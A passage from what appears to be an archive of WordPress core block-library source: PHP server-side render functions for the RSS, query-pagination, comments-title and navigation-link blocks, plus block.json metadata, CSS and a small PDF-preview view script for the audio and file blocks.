				$author = $author->get_name();
				$author = '<span class="wp-block-rss__item-author">' . sprintf(
					/* translators: %s: the author. */
					__( 'by %s' ),
					esc_html( strip_tags( $author ) )
				) . '</span>';
			}
		}

		$excerpt = '';
		if ( $attributes['displayExcerpt'] ) {
			$excerpt = html_entity_decode( $item->get_description(), ENT_QUOTES, get_option( 'blog_charset' ) );
			$excerpt = esc_attr( wp_trim_words( $excerpt, $attributes['excerptLength'], ' [&hellip;]' ) );

			// Change existing [...] to [&hellip;].
			if ( '[...]' === substr( $excerpt, -5 ) ) {
				$excerpt = substr( $excerpt, 0, -5 ) . '[&hellip;]';
			}

			$excerpt = '<div class="wp-block-rss__item-excerpt">' . esc_html( $excerpt ) . '</div>';
		}

		$list_items .= "<li class='wp-block-rss__item'>{$title}{$date}{$author}{$excerpt}</li>";
	}

	$classnames = array();
	if ( isset( $attributes['blockLayout'] ) && 'grid' === $attributes['blockLayout'] ) {
		$classnames[] = 'is-grid';
	}
	if ( isset( $attributes['columns'] ) && 'grid' === $attributes['blockLayout'] ) {
		$classnames[] = 'columns-' . $attributes['columns'];
	}
	if ( $attributes['displayDate'] ) {
		$classnames[] = 'has-dates';
	}
	if ( $attributes['displayAuthor'] ) {
		$classnames[] = 'has-authors';
	}
	if ( $attributes['displayExcerpt'] ) {
		$classnames[] = 'has-excerpts';
	}

	$wrapper_attributes = get_block_wrapper_attributes( array( 'class' => implode( ' ', $classnames ) ) );

	return sprintf( '<ul %s>%s</ul>', $wrapper_attributes, $list_items );
}

/**
 * Registers the `core/rss` block on server.
 *
 * @since 5.2.0
 */
function register_block_core_rss() {
	register_block_type_from_metadata(
		__DIR__ . '/rss',
		array(
			'render_callback' => 'render_block_core_rss',
		)
	);
}
add_action( 'init', 'register_block_core_rss' );
query-pagination.php000060400000002230151330427370010547 0ustar00<?php
/**
 * Server-side rendering of the `core/query-pagination` block.
 *
 * @package WordPress
 */

/**
 * Renders the `core/query-pagination` block on the server.
 *
 * @since 5.9.0
 *
 * @param array  $attributes Block attributes.
 * @param string $content    Block default content.
 *
 * @return string Returns the wrapper for the Query pagination.
 */
function render_block_core_query_pagination( $attributes, $content ) {
	if ( empty( trim( $content ) ) ) {
		return '';
	}

	$classes            = ( isset( $attributes['style']['elements']['link']['color']['text'] ) ) ? 'has-link-color' : '';
	$wrapper_attributes = get_block_wrapper_attributes(
		array(
			'aria-label' => __( 'Pagination' ),
			'class'      => $classes,
		)
	);

	return sprintf(
		'<nav %1$s>%2$s</nav>',
		$wrapper_attributes,
		$content
	);
}

/**
 * Registers the `core/query-pagination` block on the server.
 *
 * @since 5.8.0
 */
function register_block_core_query_pagination() {
	register_block_type_from_metadata(
		__DIR__ . '/query-pagination',
		array(
			'render_callback' => 'render_block_core_query_pagination',
		)
	);
}
add_action( 'init', 'register_block_core_query_pagination' );
comments-title.php000060400000005324151330427370010226 0ustar00<?php
/**
 * Server-side rendering of the `core/comments-title` block.
 *
 * @package WordPress
 */

/**
 * Renders the `core/comments-title` block on the server.
 *
 * @since 6.0.0
 *
 * @param array $attributes Block attributes.
 *
 * @return string Return the post comments title.
 */
function render_block_core_comments_title( $attributes ) {

	if ( post_password_required() ) {
		return;
	}

	$align_class_name    = empty( $attributes['textAlign'] ) ? '' : "has-text-align-{$attributes['textAlign']}";
	$show_post_title     = ! empty( $attributes['showPostTitle'] ) && $attributes['showPostTitle'];
	$show_comments_count = ! empty( $attributes['showCommentsCount'] ) && $attributes['showCommentsCount'];
	$wrapper_attributes  = get_block_wrapper_attributes( array( 'class' => $align_class_name ) );
	$comments_count      = get_comments_number();
	/* translators: %s: Post title. */
	$post_title = sprintf( __( '&#8220;%s&#8221;' ), get_the_title() );
	$tag_name   = 'h2';
	if ( isset( $attributes['level'] ) ) {
		$tag_name = 'h' . $attributes['level'];
	}

	if ( '0' === $comments_count ) {
		return;
	}

	if ( $show_comments_count ) {
		if ( $show_post_title ) {
			if ( '1' === $comments_count ) {
				/* translators: %s: Post title. */
				$comments_title = sprintf( __( 'One response to %s' ), $post_title );
			} else {
				$comments_title = sprintf(
					/* translators: 1: Number of comments, 2: Post title. */
					_n(
						'%1$s response to %2$s',
						'%1$s responses to %2$s',
						$comments_count
					),
					number_format_i18n( $comments_count ),
					$post_title
				);
			}
		} elseif ( '1' === $comments_count ) {
			$comments_title = __( 'One response' );
		} else {
			$comments_title = sprintf(
				/* translators: %s: Number of comments. */
				_n( '%s response', '%s responses', $comments_count ),
				number_format_i18n( $comments_count )
			);
		}
	} elseif ( $show_post_title ) {
		if ( '1' === $comments_count ) {
			/* translators: %s: Post title. */
			$comments_title = sprintf( __( 'Response to %s' ), $post_title );
		} else {
			/* translators: %s: Post title. */
			$comments_title = sprintf( __( 'Responses to %s' ), $post_title );
		}
	} elseif ( '1' === $comments_count ) {
		$comments_title = __( 'Response' );
	} else {
		$comments_title = __( 'Responses' );
	}

	return sprintf(
		'<%1$s id="comments" %2$s>%3$s</%1$s>',
		$tag_name,
		$wrapper_attributes,
		$comments_title
	);
}

/**
 * Registers the `core/comments-title` block on the server.
 *
 * @since 6.0.0
 */
function register_block_core_comments_title() {
	register_block_type_from_metadata(
		__DIR__ . '/comments-title',
		array(
			'render_callback' => 'render_block_core_comments_title',
		)
	);
}

add_action( 'init', 'register_block_core_comments_title' );
navigation-link.php000060400000032325151330427370010355 0ustar00<?php
/**
 * Server-side registering and rendering of the `core/navigation-link` block.
 *
 * @package WordPress
 */

/**
 * Build an array with CSS classes and inline styles defining the colors
 * which will be applied to the navigation markup in the front-end.
 *
 * @since 5.9.0
 *
 * @param  array $context     Navigation block context.
 * @param  array $attributes  Block attributes.
 * @param  bool  $is_sub_menu Whether the link is part of a sub-menu.
 * @return array Colors CSS classes and inline styles.
 */
function block_core_navigation_link_build_css_colors( $context, $attributes, $is_sub_menu = false ) {
	$colors = array(
		'css_classes'   => array(),
		'inline_styles' => '',
	);

	// Text color.
	$named_text_color  = null;
	$custom_text_color = null;

	if ( $is_sub_menu && array_key_exists( 'customOverlayTextColor', $context ) ) {
		$custom_text_color = $context['customOverlayTextColor'];
	} elseif ( $is_sub_menu && array_key_exists( 'overlayTextColor', $context ) ) {
		$named_text_color = $context['overlayTextColor'];
	} elseif ( array_key_exists( 'customTextColor', $context ) ) {
		$custom_text_color = $context['customTextColor'];
	} elseif ( array_key_exists( 'textColor', $context ) ) {
		$named_text_color = $context['textColor'];
	} elseif ( isset( $context['style']['color']['text'] ) ) {
		$custom_text_color = $context['style']['color']['text'];
	}

	// If has text color.
	if ( ! is_null( $named_text_color ) ) {
		// Add the color class.
		array_push( $colors['css_classes'], 'has-text-color', sprintf( 'has-%s-color', $named_text_color ) );
	} elseif ( ! is_null( $custom_text_color ) ) {
		// Add the custom color inline style.
		$colors['css_classes'][]  = 'has-text-color';
		$colors['inline_styles'] .= sprintf( 'color: %s;', $custom_text_color );
	}

	// Background color.
	$named_background_color  = null;
	$custom_background_color = null;

	if ( $is_sub_menu && array_key_exists( 'customOverlayBackgroundColor', $context ) ) {
		$custom_background_color = $context['customOverlayBackgroundColor'];
	} elseif ( $is_sub_menu && array_key_exists( 'overlayBackgroundColor', $context ) ) {
		$named_background_color = $context['overlayBackgroundColor'];
	} elseif ( array_key_exists( 'customBackgroundColor', $context ) ) {
		$custom_background_color = $context['customBackgroundColor'];
	} elseif ( array_key_exists( 'backgroundColor', $context ) ) {
		$named_background_color = $context['backgroundColor'];
	} elseif ( isset( $context['style']['color']['background'] ) ) {
		$custom_background_color = $context['style']['color']['background'];
	}

	// If has background color.
	if ( ! is_null( $named_background_color ) ) {
		// Add the background-color class.
		array_push( $colors['css_classes'], 'has-background', sprintf( 'has-%s-background-color', $named_background_color ) );
	} elseif ( ! is_null( $custom_background_color ) ) {
		// Add the custom background-color inline style.
		$colors['css_classes'][]  = 'has-background';
		$colors['inline_styles'] .= sprintf( 'background-color: %s;', $custom_background_color );
	}

	return $colors;
}

/**
 * Build an array with CSS classes and inline styles defining the font sizes
 * which will be applied to the navigation markup in the front-end.
 *
 * @since 5.9.0
 *
 * @param  array $context Navigation block context.
 * @return array Font size CSS classes and inline styles.
 */
function block_core_navigation_link_build_css_font_sizes( $context ) {
	// CSS classes.
	$font_sizes = array(
		'css_classes'   => array(),
		'inline_styles' => '',
	);

	$has_named_font_size  = array_key_exists( 'fontSize', $context );
	$has_custom_font_size = isset( $context['style']['typography']['fontSize'] );

	if ( $has_named_font_size ) {
		// Add the font size class.
		$font_sizes['css_classes'][] = sprintf( 'has-%s-font-size', $context['fontSize'] );
	} elseif ( $has_custom_font_size ) {
		// Add the custom font size inline style.
		$font_sizes['inline_styles'] = sprintf(
			'font-size: %s;',
			wp_get_typography_font_size_value(
				array(
					'size' => $context['style']['typography']['fontSize'],
				)
			)
		);
	}

	return $font_sizes;
}

/**
 * Returns the top-level submenu SVG chevron icon.
 *
 * @since 5.9.0
 *
 * @return string
 */
function block_core_navigation_link_render_submenu_icon() {
	return '<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 12 12" fill="none" aria-hidden="true" focusable="false"><path d="M1.50002 4L6.00002 8L10.5 4" stroke-width="1.5"></path></svg>';
}

/**
 * Decodes a url if it's encoded, returning the same url if not.
 *
 * @since 6.2.0
 *
 * @param string $url The url to decode.
 *
 * @return string $url Returns the decoded url.
 */
function block_core_navigation_link_maybe_urldecode( $url ) {
	$is_url_encoded = false;
	$query          = parse_url( $url, PHP_URL_QUERY );
	$query_params   = wp_parse_args( $query );

	foreach ( $query_params as $query_param ) {
		$can_query_param_be_encoded = is_string( $query_param ) && ! empty( $query_param );
		if ( ! $can_query_param_be_encoded ) {
			continue;
		}
		if ( rawurldecode( $query_param ) !== $query_param ) {
			$is_url_encoded = true;
			break;
		}
	}

	if ( $is_url_encoded ) {
		return rawurldecode( $url );
	}

	return $url;
}


/**
 * Renders the `core/navigation-link` block.
 *
 * @since 5.9.0
 *
 * @param array    $attributes The block attributes.
 * @param string   $content    The saved content.
 * @param WP_Block $block      The parsed block.
 *
 * @return string Returns the post content with the legacy widget added.
 */
function render_block_core_navigation_link( $attributes, $content, $block ) {
	$navigation_link_has_id = isset( $attributes['id'] ) && is_numeric( $attributes['id'] );
	$is_post_type           = isset( $attributes['kind'] ) && 'post-type' === $attributes['kind'];
	$is_post_type           = $is_post_type || isset( $attributes['type'] ) && ( 'post' === $attributes['type'] || 'page' === $attributes['type'] );

	// Don't render the block's subtree if it is a draft or if the ID does not exist.
	if ( $is_post_type && $navigation_link_has_id ) {
		$post = get_post( $attributes['id'] );
		if ( ! $post || 'publish' !== $post->post_status ) {
			return '';
		}
	}

	// Don't render the block's subtree if it has no label.
	if ( empty( $attributes['label'] ) ) {
		return '';
	}

	$font_sizes      = block_core_navigation_link_build_css_font_sizes( $block->context );
	$classes         = array_merge(
		$font_sizes['css_classes']
	);
	$style_attribute = $font_sizes['inline_styles'];

	$css_classes = trim( implode( ' ', $classes ) );
	$has_submenu = count( $block->inner_blocks ) > 0;
	$kind        = empty( $attributes['kind'] ) ? 'post_type' : str_replace( '-', '_', $attributes['kind'] );
	$is_active   = ! empty( $attributes['id'] ) && get_queried_object_id() === (int) $attributes['id'] && ! empty( get_queried_object()->$kind );

	if ( is_post_type_archive() ) {
		$queried_archive_link = get_post_type_archive_link( get_queried_object()->name );
		if ( $attributes['url'] === $queried_archive_link ) {
			$is_active = true;
		}
	}

	$wrapper_attributes = get_block_wrapper_attributes(
		array(
			'class' => $css_classes . ' wp-block-navigation-item' . ( $has_submenu ? ' has-child' : '' ) .
				( $is_active ? ' current-menu-item' : '' ),
			'style' => $style_attribute,
		)
	);
	$html               = '<li ' . $wrapper_attributes . '>' .
		'<a class="wp-block-navigation-item__content" ';

	// Start appending HTML attributes to anchor tag.
	if ( isset( $attributes['url'] ) ) {
		$html .= ' href="' . esc_url( block_core_navigation_link_maybe_urldecode( $attributes['url'] ) ) . '"';
	}

	if ( $is_active ) {
		$html .= ' aria-current="page"';
	}

	if ( isset( $attributes['opensInNewTab'] ) && true === $attributes['opensInNewTab'] ) {
		$html .= ' target="_blank"  ';
	}

	if ( isset( $attributes['rel'] ) ) {
		$html .= ' rel="' . esc_attr( $attributes['rel'] ) . '"';
	} elseif ( isset( $attributes['nofollow'] ) && $attributes['nofollow'] ) {
		$html .= ' rel="nofollow"';
	}

	if ( isset( $attributes['title'] ) ) {
		$html .= ' title="' . esc_attr( $attributes['title'] ) . '"';
	}

	// End appending HTML attributes to anchor tag.

	// Start anchor tag content.
	$html .= '>' .
		// Wrap title with span to isolate it from submenu icon.
		'<span class="wp-block-navigation-item__label">';

	if ( isset( $attributes['label'] ) ) {
		$html .= wp_kses_post( $attributes['label'] );
	}

	$html .= '</span>';

	// Add description if available.
	if ( ! empty( $attributes['description'] ) ) {
		$html .= '<span class="wp-block-navigation-item__description">';
		$html .= wp_kses_post( $attributes['description'] );
		$html .= '</span>';
	}

	$html .= '</a>';
	// End anchor tag content.

	if ( isset( $block->context['showSubmenuIcon'] ) && $block->context['showSubmenuIcon'] && $has_submenu ) {
		// The submenu icon can be hidden by a CSS rule on the Navigation Block.
		$html .= '<span class="wp-block-navigation__submenu-icon">' . block_core_navigation_link_render_submenu_icon() . '</span>';
	}

	if ( $has_submenu ) {
		$inner_blocks_html = '';
		foreach ( $block->inner_blocks as $inner_block ) {
			$inner_blocks_html .= $inner_block->render();
		}

		$html .= sprintf(
			'<ul class="wp-block-navigation__submenu-container">%s</ul>',
			$inner_blocks_html
		);
	}

	$html .= '</li>';

	return $html;
}

/**
 * Returns a navigation link variation
 *
 * @since 5.9.0
 *
 * @param WP_Taxonomy|WP_Post_Type $entity post type or taxonomy entity.
 * @param string                   $kind string of value 'taxonomy' or 'post-type'.
 *
 * @return array
 */
function build_variation_for_navigation_link( $entity, $kind ) {
	$title       = '';
	$description = '';

	if ( property_exists( $entity->labels, 'item_link' ) ) {
		$title = $entity->labels->item_link;
	}
	if ( property_exists( $entity->labels, 'item_link_description' ) ) {
		$description = $entity->labels->item_link_description;
	}

	$variation = array(
		'name'        => $entity->name,
		'title'       => $title,
		'description' => $description,
		'attributes'  => array(
			'type' => $entity->name,
			'kind' => $kind,
		),
	);

	// Tweak some value for the variations.
	$variation_overrides = array(
		'post_tag'    => array(
			'name'       => 'tag',
			'attributes' => array(
				'type' => 'tag',
				'kind' => $kind,
			),
		),
		'post_format' => array(
			// The item_link and item_link_description for post formats is the
			// same as for tags, so need to be overridden.
			'title'       => __( 'Post Format Link' ),
			'description' => __( 'A link to a post format' ),
			'attributes'  => array(
				'type' => 'post_format',
				'kind' => $kind,
			),
		),
	);

	if ( array_key_exists( $entity->name, $variation_overrides ) ) {
		$variation = array_merge(
			$variation,
			$variation_overrides[ $entity->name ]
		);
	}

	return $variation;
}

/**
 * Filters the registered variations for a block type.
 * Returns the dynamically built variations for all post-types and taxonomies.
 *
 * @since 6.5.0
 *
 * @param array         $variations Array of registered variations for a block type.
 * @param WP_Block_Type $block_type The full block type object.
 */
function block_core_navigation_link_filter_variations( $variations, $block_type ) {
	if ( 'core/navigation-link' !== $block_type->name ) {
		return $variations;
	}

	$generated_variations = block_core_navigation_link_build_variations();
	return array_merge( $variations, $generated_variations );
}

/**
 * Returns an array of variations for the navigation link block.
 *
 * @since 6.5.0
 *
 * @return array
 */
function block_core_navigation_link_build_variations() {
	$post_types = get_post_types( array( 'show_in_nav_menus' => true ), 'objects' );
	$taxonomies = get_taxonomies( array( 'show_in_nav_menus' => true ), 'objects' );

	/*
	 * Use two separate arrays as a way to order the variations in the UI.
	 * Known variations (like Post Link and Page Link) are added to the
	 * `built_ins` array. Variations for custom post types and taxonomies are
	 * added to the `variations` array and will always appear after `built-ins.
	 */
	$built_ins  = array();
	$variations = array();

	if ( $post_types ) {
		foreach ( $post_types as $post_type ) {
			$variation = build_variation_for_navigation_link( $post_type, 'post-type' );
			if ( $post_type->_builtin ) {
				$built_ins[] = $variation;
			} else {
				$variations[] = $variation;
			}
		}
	}
	if ( $taxonomies ) {
		foreach ( $taxonomies as $taxonomy ) {
			$variation = build_variation_for_navigation_link( $taxonomy, 'taxonomy' );
			if ( $taxonomy->_builtin ) {
				$built_ins[] = $variation;
			} else {
				$variations[] = $variation;
			}
		}
	}

	return array_merge( $built_ins, $variations );
}

/**
 * Registers the navigation link block.
 *
 * @since 5.9.0
 *
 * @uses render_block_core_navigation_link()
 * @throws WP_Error An WP_Error exception parsing the block definition.
 */
function register_block_core_navigation_link() {
	register_block_type_from_metadata(
		__DIR__ . '/navigation-link',
		array(
			'render_callback' => 'render_block_core_navigation_link',
		)
	);
}
add_action( 'init', 'register_block_core_navigation_link' );
/**
 * Creates all variations for post types / taxonomies dynamically (= each time when variations are requested).
 * Do not use variation_callback, to also account for unregistering post types/taxonomies later on.
 */
add_action( 'get_block_type_variations', 'block_core_navigation_link_filter_variations', 10, 2 );
audio/theme-rtl.min.css000060400000000260151330427370011041 0ustar00.wp-block-audio :where(figcaption){color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-audio :where(figcaption){color:#ffffffa6}.wp-block-audio{margin:0 0 1em}audio/style.min.css000060400000000234151330427370010301 0ustar00.wp-block-audio{box-sizing:border-box}.wp-block-audio :where(figcaption){margin-bottom:1em;margin-top:.5em}.wp-block-audio audio{min-width:300px;width:100%}audio/block.json000060400000002440151330427370007633 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/audio",
	"title": "Audio",
	"category": "media",
	"description": "Embed a simple audio player.",
	"keywords": [ "music", "sound", "podcast", "recording" ],
	"textdomain": "default",
	"attributes": {
		"src": {
			"type": "string",
			"source": "attribute",
			"selector": "audio",
			"attribute": "src",
			"__experimentalRole": "content"
		},
		"caption": {
			"type": "rich-text",
			"source": "rich-text",
			"selector": "figcaption",
			"__experimentalRole": "content"
		},
		"id": {
			"type": "number",
			"__experimentalRole": "content"
		},
		"autoplay": {
			"type": "boolean",
			"source": "attribute",
			"selector": "audio",
			"attribute": "autoplay"
		},
		"loop": {
			"type": "boolean",
			"source": "attribute",
			"selector": "audio",
			"attribute": "loop"
		},
		"preload": {
			"type": "string",
			"source": "attribute",
			"selector": "audio",
			"attribute": "preload"
		}
	},
	"supports": {
		"anchor": true,
		"align": true,
		"spacing": {
			"margin": true,
			"padding": true,
			"__experimentalDefaultControls": {
				"margin": false,
				"padding": false
			}
		},
		"interactivity": {
			"clientNavigation": true
		}
	},
	"editorStyle": "wp-block-audio-editor",
	"style": "wp-block-audio"
}
audio/theme-rtl.css000060400000000310151330427370010253 0ustar00.wp-block-audio :where(figcaption){
  color:#555;
  font-size:13px;
  text-align:center;
}
.is-dark-theme .wp-block-audio :where(figcaption){
  color:#ffffffa6;
}

.wp-block-audio{
  margin:0 0 1em;
}audio/editor.min.css000060400000000325151330427370010430 0ustar00.wp-block-audio{margin-left:0;margin-right:0;position:relative}.wp-block-audio.is-transient audio{opacity:.3}.wp-block-audio .components-spinner{left:50%;margin-left:-9px;margin-top:-9px;position:absolute;top:50%}audio/style-rtl.min.css000060400000000234151330427370011100 0ustar00.wp-block-audio{box-sizing:border-box}.wp-block-audio :where(figcaption){margin-bottom:1em;margin-top:.5em}.wp-block-audio audio{min-width:300px;width:100%}audio/style-rtl.css000060400000000263151330427370010320 0ustar00.wp-block-audio{
  box-sizing:border-box;
}
.wp-block-audio :where(figcaption){
  margin-bottom:1em;
  margin-top:.5em;
}
.wp-block-audio audio{
  min-width:300px;
  width:100%;
}audio/editor.css000060400000000370151330427370007646 0ustar00.wp-block-audio{
  margin-left:0;
  margin-right:0;
  position:relative;
}
.wp-block-audio.is-transient audio{
  opacity:.3;
}
.wp-block-audio .components-spinner{
  left:50%;
  margin-left:-9px;
  margin-top:-9px;
  position:absolute;
  top:50%;
}audio/editor-rtl.css000060400000000372151330427370010447 0ustar00.wp-block-audio{
  margin-left:0;
  margin-right:0;
  position:relative;
}
.wp-block-audio.is-transient audio{
  opacity:.3;
}
.wp-block-audio .components-spinner{
  margin-right:-9px;
  margin-top:-9px;
  position:absolute;
  right:50%;
  top:50%;
}audio/theme.css000060400000000310151330427370007454 0ustar00.wp-block-audio :where(figcaption){
  color:#555;
  font-size:13px;
  text-align:center;
}
.is-dark-theme .wp-block-audio :where(figcaption){
  color:#ffffffa6;
}

.wp-block-audio{
  margin:0 0 1em;
}audio/theme.min.css000060400000000260151330427370010242 0ustar00.wp-block-audio :where(figcaption){color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-audio :where(figcaption){color:#ffffffa6}.wp-block-audio{margin:0 0 1em}audio/editor-rtl.min.css000060400000000327151330427370011231 0ustar00.wp-block-audio{margin-left:0;margin-right:0;position:relative}.wp-block-audio.is-transient audio{opacity:.3}.wp-block-audio .components-spinner{margin-right:-9px;margin-top:-9px;position:absolute;right:50%;top:50%}audio/style.css000060400000000263151330427370007521 0ustar00.wp-block-audio{
  box-sizing:border-box;
}
.wp-block-audio :where(figcaption){
  margin-bottom:1em;
  margin-top:.5em;
}
.wp-block-audio audio{
  min-width:300px;
  width:100%;
}file/editor.min.css000060400000001372151330427370010251 0ustar00.wp-block-file{align-items:center;display:flex;flex-wrap:wrap;justify-content:space-between;margin-bottom:0}.wp-block[data-align=left]>.wp-block-file,.wp-block[data-align=right]>.wp-block-file{height:auto}.wp-block[data-align=center]>.wp-block-file{text-align:center}.wp-block-file .components-resizable-box__container{margin-bottom:1em}.wp-block-file .wp-block-file__preview{height:100%;margin-bottom:1em;width:100%}.wp-block-file .wp-block-file__preview-overlay{bottom:0;left:0;position:absolute;right:0;top:0}.wp-block-file .wp-block-file__content-wrapper{flex-grow:1}.wp-block-file a{min-width:1em}.wp-block-file a:not(.wp-block-file__button){display:inline-block}.wp-block-file .wp-block-file__button-richtext-wrapper{display:inline-block;margin-left:.75em}file/view.js000060400000006145151330427370007002 0ustar00import * as __WEBPACK_EXTERNAL_MODULE__wordpress_interactivity_8e89b257__ from "@wordpress/interactivity";
/******/ // The require scope
/******/ var __webpack_require__ = {};
/******/ 
/************************************************************************/
/******/ /* webpack/runtime/define property getters */
/******/ (() => {
/******/ 	// define getter functions for harmony exports
/******/ 	__webpack_require__.d = (exports, definition) => {
/******/ 		for(var key in definition) {
/******/ 			if(__webpack_require__.o(definition, key) && !__webpack_require__.o(exports, key)) {
/******/ 				Object.defineProperty(exports, key, { enumerable: true, get: definition[key] });
/******/ 			}
/******/ 		}
/******/ 	};
/******/ })();
/******/ 
/******/ /* webpack/runtime/hasOwnProperty shorthand */
/******/ (() => {
/******/ 	__webpack_require__.o = (obj, prop) => (Object.prototype.hasOwnProperty.call(obj, prop))
/******/ })();
/******/ 
/************************************************************************/
var __webpack_exports__ = {};

;// CONCATENATED MODULE: external "@wordpress/interactivity"
var x = (y) => {
	var x = {}; __webpack_require__.d(x, y); return x
} 
var y = (x) => (() => (x))
const interactivity_namespaceObject = x({ ["store"]: () => (__WEBPACK_EXTERNAL_MODULE__wordpress_interactivity_8e89b257__.store) });
;// CONCATENATED MODULE: ./node_modules/@wordpress/block-library/build-module/file/utils/index.js
/**
 * Uses a combination of user agent matching and feature detection to determine whether
 * the current browser supports rendering PDFs inline.
 *
 * @return {boolean} Whether or not the browser supports inline PDFs.
 */
const browserSupportsPdfs = () => {
  // Most mobile devices include "Mobi" in their UA.
  if (window.navigator.userAgent.indexOf('Mobi') > -1) {
    return false;
  }

  // Android tablets are the noteable exception.
  if (window.navigator.userAgent.indexOf('Android') > -1) {
    return false;
  }

  // iPad pretends to be a Mac.
  if (window.navigator.userAgent.indexOf('Macintosh') > -1 && window.navigator.maxTouchPoints && window.navigator.maxTouchPoints > 2) {
    return false;
  }

  // IE only supports PDFs when there's an ActiveX object available for it.
  if (!!(window.ActiveXObject || 'ActiveXObject' in window) && !(createActiveXObject('AcroPDF.PDF') || createActiveXObject('PDF.PdfCtrl'))) {
    return false;
  }
  return true;
};

/**
 * Helper function for creating ActiveX objects, catching any errors that are thrown
 * when it's generated.
 *
 * @param {string} type The name of the ActiveX object to create.
 * @return {window.ActiveXObject|undefined} The generated ActiveXObject, or null if it failed.
 */
const createActiveXObject = type => {
  let ax;
  try {
    ax = new window.ActiveXObject(type);
  } catch (e) {
    ax = undefined;
  }
  return ax;
};

;// CONCATENATED MODULE: ./node_modules/@wordpress/block-library/build-module/file/view.js
/**
 * WordPress dependencies
 */

/**
 * Internal dependencies
 */

(0,interactivity_namespaceObject.store)('core/file', {
  state: {
    get hasPdfPreview() {
      return browserSupportsPdfs();
    }
  }
}, {
  lock: true
});

file/style-rtl.min.css000060400000001203151330427370010713 0ustar00.wp-block-file{box-sizing:border-box}.wp-block-file:not(.wp-element-button){font-size:.8em}.wp-block-file.aligncenter{text-align:center}.wp-block-file.alignright{text-align:right}.wp-block-file *+.wp-block-file__button{margin-right:.75em}:where(.wp-block-file){margin-bottom:1.5em}.wp-block-file__embed{margin-bottom:1em}:where(.wp-block-file__button){border-radius:2em;display:inline-block;padding:.5em 1em}:where(.wp-block-file__button):is(a):active,:where(.wp-block-file__button):is(a):focus,:where(.wp-block-file__button):is(a):hover,:where(.wp-block-file__button):is(a):visited{box-shadow:none;color:#fff;opacity:.85;text-decoration:none}file/style.min.css000060400000001202151330427370010113 0ustar00.wp-block-file{box-sizing:border-box}.wp-block-file:not(.wp-element-button){font-size:.8em}.wp-block-file.aligncenter{text-align:center}.wp-block-file.alignright{text-align:right}.wp-block-file *+.wp-block-file__button{margin-left:.75em}:where(.wp-block-file){margin-bottom:1.5em}.wp-block-file__embed{margin-bottom:1em}:where(.wp-block-file__button){border-radius:2em;display:inline-block;padding:.5em 1em}:where(.wp-block-file__button):is(a):active,:where(.wp-block-file__button):is(a):focus,:where(.wp-block-file__button):is(a):hover,:where(.wp-block-file__button):is(a):visited{box-shadow:none;color:#fff;opacity:.85;text-decoration:none}file/block.json000060400000002746151330427370007462 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/file",
	"title": "File",
	"category": "media",
	"description": "Add a link to a downloadable file.",
	"keywords": [ "document", "pdf", "download" ],
	"textdomain": "default",
	"attributes": {
		"id": {
			"type": "number"
		},
		"href": {
			"type": "string"
		},
		"fileId": {
			"type": "string",
			"source": "attribute",
			"selector": "a:not([download])",
			"attribute": "id"
		},
		"fileName": {
			"type": "rich-text",
			"source": "rich-text",
			"selector": "a:not([download])"
		},
		"textLinkHref": {
			"type": "string",
			"source": "attribute",
			"selector": "a:not([download])",
			"attribute": "href"
		},
		"textLinkTarget": {
			"type": "string",
			"source": "attribute",
			"selector": "a:not([download])",
			"attribute": "target"
		},
		"showDownloadButton": {
			"type": "boolean",
			"default": true
		},
		"downloadButtonText": {
			"type": "rich-text",
			"source": "rich-text",
			"selector": "a[download]"
		},
		"displayPreview": {
			"type": "boolean"
		},
		"previewHeight": {
			"type": "number",
			"default": 600
		}
	},
	"supports": {
		"anchor": true,
		"align": true,
		"spacing": {
			"margin": true,
			"padding": true
		},
		"color": {
			"gradients": true,
			"link": true,
			"text": false,
			"__experimentalDefaultControls": {
				"background": true,
				"link": true
			}
		},
		"interactivity": true
	},
	"editorStyle": "wp-block-file-editor",
	"style": "wp-block-file"
}
file/editor-rtl.css000060400000001527151330427370010270 0ustar00.wp-block-file{
  align-items:center;
  display:flex;
  flex-wrap:wrap;
  justify-content:space-between;
  margin-bottom:0;
}
.wp-block[data-align=left]>.wp-block-file,.wp-block[data-align=right]>.wp-block-file{
  height:auto;
}
.wp-block[data-align=center]>.wp-block-file{
  text-align:center;
}
.wp-block-file .components-resizable-box__container{
  margin-bottom:1em;
}
.wp-block-file .wp-block-file__preview{
  height:100%;
  margin-bottom:1em;
  width:100%;
}
.wp-block-file .wp-block-file__preview-overlay{
  bottom:0;
  left:0;
  position:absolute;
  right:0;
  top:0;
}
.wp-block-file .wp-block-file__content-wrapper{
  flex-grow:1;
}
.wp-block-file a{
  min-width:1em;
}
.wp-block-file a:not(.wp-block-file__button){
  display:inline-block;
}
.wp-block-file .wp-block-file__button-richtext-wrapper{
  display:inline-block;
  margin-right:.75em;
}file/style.css000060400000001311151330427370007332 0ustar00.wp-block-file{
  box-sizing:border-box;
}
.wp-block-file:not(.wp-element-button){
  font-size:.8em;
}
.wp-block-file.aligncenter{
  text-align:center;
}
.wp-block-file.alignright{
  text-align:right;
}
.wp-block-file *+.wp-block-file__button{
  margin-left:.75em;
}

:where(.wp-block-file){
  margin-bottom:1.5em;
}

.wp-block-file__embed{
  margin-bottom:1em;
}

:where(.wp-block-file__button){
  border-radius:2em;
  display:inline-block;
  padding:.5em 1em;
}
:where(.wp-block-file__button):is(a):active,:where(.wp-block-file__button):is(a):focus,:where(.wp-block-file__button):is(a):hover,:where(.wp-block-file__button):is(a):visited{
  box-shadow:none;
  color:#fff;
  opacity:.85;
  text-decoration:none;
}file/view.min.asset.php000060400000000124151330427370011044 0ustar00<?php return array('dependencies' => array(), 'version' => '9c04187f1796859989c3');
file/view.asset.php000060400000000124151330427370010262 0ustar00<?php return array('dependencies' => array(), 'version' => '498971a8a9512421f3b5');
file/editor.css000060400000001526151330427370007470 0ustar00.wp-block-file{
  align-items:center;
  display:flex;
  flex-wrap:wrap;
  justify-content:space-between;
  margin-bottom:0;
}
.wp-block[data-align=left]>.wp-block-file,.wp-block[data-align=right]>.wp-block-file{
  height:auto;
}
.wp-block[data-align=center]>.wp-block-file{
  text-align:center;
}
.wp-block-file .components-resizable-box__container{
  margin-bottom:1em;
}
.wp-block-file .wp-block-file__preview{
  height:100%;
  margin-bottom:1em;
  width:100%;
}
.wp-block-file .wp-block-file__preview-overlay{
  bottom:0;
  left:0;
  position:absolute;
  right:0;
  top:0;
}
